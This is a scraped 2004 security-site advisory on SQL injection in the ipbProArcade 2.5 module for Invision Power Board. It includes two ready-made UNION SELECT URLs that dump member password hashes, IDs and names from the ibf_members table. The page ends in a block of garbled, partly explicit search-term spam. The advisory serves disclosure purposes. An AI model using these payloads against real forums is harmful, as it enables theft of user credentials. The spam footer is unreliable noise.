about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IPBProArcade Remote SQL Injection Vulnerability


Title IPBProArcade Remote SQL Injection Vulnerability
Published 2004-11-20-12:00AM
Updated 2004-11-20-10:14PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Disclosure of this issue is credited to axl daivy <axlownz@gmail.com>.
Vulnerable  ipbProArcade ipbProArcade 2.5
Not Vulnerable  
Code   No exploit is required to leverage this issue. The following proof of concept exploits have been provided:

For modules installed on Invision Power Board versions 1.X:
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

For modules installed on Invision Power Board versions 2.X:
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 12:04:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
FastBB v9. sexholl ctfriend.n news for C vm-pop3 openssm 4. WWW.GIRLSE Wii Boot L mom boy phpmyfaq news for c vediosex.c b i g d i Free sex a grils arab american sXe Inject www.250wyt www.6m8m.c CMS is Fre tamil tris myanmarsex sexy videi components guest book Www.sexywa www.inftw. www.250wyt Sextasya SEXMUVEE 6/senetman DOWNLOAD V indianwoma /search/ex www.usbmou sextamilmo php 4.0.4 sigma Sepong thugie Www.Sexy89 amelly+tee Fireboard maxpifa.cn assfucking Trishaboth emogirlspo php-nuke 2 sextamilmo maxpifa.cn